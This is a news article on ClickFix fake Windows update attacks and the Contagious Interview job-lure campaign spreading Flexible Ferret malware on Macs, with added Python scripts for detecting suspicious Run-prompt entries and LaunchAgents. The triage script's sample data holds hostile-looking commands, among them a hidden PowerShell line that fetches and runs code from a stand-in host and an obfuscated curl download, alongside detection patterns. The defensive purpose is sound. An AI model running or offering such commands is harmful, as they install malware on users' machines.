It’s been another turbulent week for computer users, as fresh reports highlight a surge in sophisticated cyberattacks targeting both Windows and Mac operating systems. From fake Windows security updates to bogus job interviews for Mac users, hackers are deploying cunning social engineering tactics and technical sleights of hand to steal credentials, install malware, and gain long-term access to victims’ devices. The latest threat intelligence from Huntress, Acronis, and Malwarebytes paints a picture of a digital landscape where vigilance is more crucial than ever.
According to Forbes, a November 26, 2025 update from the Acronis Threat Research Unit has sounded the alarm on a new wave of ClickFix cyberattack campaigns. These attacks leverage fake Windows security update prompts—so realistic that even seasoned users might be fooled—to trick people into running malicious commands. The attackers’ strategy? Simple but effective: they present users with what appear to be urgent system updates, complete with full-screen Windows Security Update visuals, and instruct them to copy and paste commands into the Windows run prompt. In reality, these commands execute malware that can steal credentials and compromise the entire system.
Huntress security analysts Ben Folland and Anna Pham, cited by Forbes, uncovered a particularly devious twist in this campaign: the use of steganography. Rather than simply appending malicious data to files, the attackers encode their malware directly within the pixel data of PNG images. By manipulating specific color channels, they can reconstruct and decrypt the payload in memory, making detection by traditional antivirus tools much harder. As Folland and Pham put it, “A notable discovery during analysis was the campaign's use of steganography to conceal the final malware stages within an image.”
But the psychological manipulation doesn’t stop there. The Acronis Threat Research Unit described a variant they call the JackFix attack, which combines the fake Windows update with screen hijacking techniques. Eliad Kimhy from Acronis explained that attackers often lure victims through adult-themed websites, increasing the pressure to comply with sudden security update instructions. “The adult theme, and possible connection to shady websites,” Kimhy said, “adds to the victim’s psychological pressure, making victims more likely to comply with sudden security update installation instructions.” This campaign also obfuscates both the commands and the payload, helping it evade current ClickFix prevention and detection methods.
The scale of the threat is significant. Microsoft itself has warned that ClickFix is now the most common method for hackers to gain initial access, accounting for 47 percent of attacks observed in Microsoft Defender notifications. These numbers underscore just how widespread and effective these social engineering attacks have become.
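Commands entered in the Run prompt, as in the ClickFix campaigns described above, are recorded per user in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which gives defenders a place to look after the fact. The Python below is an added example, not code from Forbes, Acronis or Huntress: it triages such entries with heuristics that are assumptions of this example, and the sample entries are constructed.

```python
import re

# Heuristic indicators: assumptions of this example, not vendor signatures.
INDICATORS = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript)(\.exe)?\b", re.I),
    "downloader": re.compile(r"\b(curl|certutil|bitsadmin|iwr|irm|invoke-webrequest)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_or_encoded": re.compile(
        r"\s-(e|ec|enc|encodedcommand)\b|\s-w(indowstyle)?\s+h(idden)?\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

# Constructed RunMRU values for illustration; real values end in "\1".
SAMPLE_RUNMRU = [
    r"notepad\1",
    r"\\fileserver\share\1",
    r"cmd\1",
    r'powershell -w hidden -c "iex (irm https://updates.example.invalid/fix)"\1',
    r"cmd /c cu^rl https://cdn.example.invalid/u.bat -o %TEMP%\fix.bat\1",
]

def normalize(entry):
    """Drop the trailing '\\1' marker and cmd.exe caret escapes used to split keywords."""
    if entry.endswith("\\1"):
        entry = entry[:-2]
    return entry.replace("^", "").strip()

def triage(entry):
    """Return the sorted names of every indicator the normalized command matches."""
    command = normalize(entry)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(command))

def suspicious(entries, threshold=2):
    """Keep entries matching at least `threshold` indicators; one alone is too noisy."""
    flagged = []
    for entry in entries:
        hits = triage(entry)
        if len(hits) >= threshold:
            flagged.append((normalize(entry), hits))
    return flagged

if __name__ == "__main__":
    for command, hits in suspicious(SAMPLE_RUNMRU):
        print(f"{', '.join(hits)}: {command}")
```

Because the campaigns obfuscate their commands, a clean result from keyword heuristics like these does not clear a machine; any Run-prompt entry the user does not recognise is worth reviewing.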
While Windows users grapple with these evolving threats, Mac users are facing their own wave of targeted attacks. A November 26, 2025 report from Malwarebytes details a campaign dubbed Contagious Interview, which preys on job seekers by impersonating recruiters—often via LinkedIn—and directing them to fake job websites. The attackers, believed to be associated with the Democratic People’s Republic of Korea (DPRK), pose as representatives of well-known brands and entice victims to apply for roles ranging from software development and AI research to cryptocurrency and non-technical positions.
The ruse is elaborate: after initial contact, the victim is asked to record a video introduction and upload it to a special website. Once on the site, the applicant is told that their camera or microphone access is blocked. To “fix” this, the site prompts them to download an “update” for FFmpeg, a legitimate media-processing tool. But the download is a trojan horse—a backdoor designed to compromise the system.
Much like the ClickFix attacks, the site instructs victims to run a curl command in their Terminal, which downloads and executes a script that installs the malware. The campaign’s endgame is Flexible Ferret, a multi-stage macOS malware chain active since early 2025. Once installed, Flexible Ferret creates a LaunchAgent, ensuring the malware reloads every time the user logs in. This grants attackers persistent, covert access to the infected Mac.
Flexible Ferret’s capabilities are extensive and dangerous. The core payload is a Go-based backdoor that enables attackers to collect detailed information about the victim’s device, upload and download files, execute shell commands (giving full system control), extract Chrome browser profile data, and automate further credential and data theft. After stealing the user’s password—prompted by a fake Chrome window—the malware immediately establishes persistence and connects to the attackers’ infrastructure, turning the compromised Mac into a node in a remote-controlled botnet.
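The LaunchAgent persistence described above leaves a property-list file that can be audited. The Python below is an added example, not code from Malwarebytes or the malware itself: it parses LaunchAgent plists and reports agents whose program runs from an unusual place. The risky-location rules are assumptions of this example, and the sample agents, labels and paths are constructed placeholders rather than indicators from the report.

```python
import plistlib
from pathlib import Path, PurePosixPath

# Locations and launchers treated as risky: assumptions of this example.
RISKY_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
SHELLS = {"sh", "bash", "zsh"}

# Constructed sample agents (labels and paths are placeholders, not indicators).
SAMPLE_BENIGN = plistlib.dumps({
    "Label": "com.example.helper", "RunAtLoad": True,
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper"]})
SAMPLE_SUSPECT = plistlib.dumps({
    "Label": "com.example.updater", "RunAtLoad": True,
    "ProgramArguments": ["/Users/alice/.local/cache/updater", "--quiet"]})

def audit_agent(plist_bytes):
    """Parse one LaunchAgent plist and list the reasons its program looks out of place."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or [job.get("Program", "")]
    exe = PurePosixPath(args[0])
    reasons = []
    if str(exe).startswith(RISKY_PREFIXES):
        reasons.append(f"runs from a world-writable location: {exe}")
    if any(part.startswith(".") for part in exe.parts):
        reasons.append(f"runs from a hidden directory: {exe}")
    if exe.name in SHELLS and "-c" in args:
        reasons.append("launches an inline shell command")
    persistent = bool(job.get("RunAtLoad") or job.get("KeepAlive"))
    return {"label": job.get("Label"), "persistent": persistent, "reasons": reasons}

def scan(directory=Path.home() / "Library" / "LaunchAgents"):
    """Audit every plist in a LaunchAgents folder; return only agents with findings."""
    findings = []
    for path in sorted(Path(directory).glob("*.plist")):
        try:
            report = audit_agent(path.read_bytes())
        except Exception as exc:  # a malformed plist is itself worth a look
            report = {"label": None, "persistent": False, "reasons": [f"unparseable: {exc}"]}
        if report["reasons"]:
            findings.append((path.name, report))
    return findings

if __name__ == "__main__":
    for name, report in scan():
        print(name, report)
```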
Windows users aren’t off the hook, either. The same lure is used, but instead of Flexible Ferret, victims receive a different malware variant called InvisibleFerret, designed to steal information from Windows systems. This cross-platform approach demonstrates the attackers’ adaptability and the growing convergence of threats facing users of all major operating systems.
So, what can users do to protect themselves? Security experts across the board agree: awareness and caution are the best defenses. For Windows users, the most important rule is never to copy and paste commands from a website into the Windows run prompt—genuine Windows security updates simply do not require this. As Forbes emphasized, “a genuine Windows security update, just like the fake CAPTCHA screens employed before, will never, ever, require the user to cut and paste commands into the Windows run prompt from a web page.”
For Mac users, the advice is similar: never run code or commands you don’t fully understand, especially if prompted by a website or unsolicited communication. Always verify the legitimacy of software updates and job offers independently. Malwarebytes also recommends keeping your operating system, software, and security tools updated with the latest patches, using real-time anti-malware with web protection, and being wary of unsolicited messages, especially those inviting you to meetings or requesting software installs.
Both reports stress the importance of checking URLs carefully and verifying the authenticity of any communication before clicking links or downloading attachments. If in doubt, consult official documentation or contact support directly—better safe than sorry.
The recent surge in these campaigns highlights just how creative and persistent cybercriminals have become. By blending technical sophistication with psychological manipulation, they’re finding new ways to exploit trust and urgency. While tech giants like Microsoft continue to patch vulnerabilities and issue security updates—even for unsupported operating systems like Windows 10—the responsibility for staying safe is increasingly shared between companies and individual users.
As the year draws to a close, the message from security researchers is clear: stay alert, question unexpected prompts, and never underestimate the lengths to which attackers will go. The latest wave of attacks is a stark reminder that, in the digital world, a little skepticism can go a long way.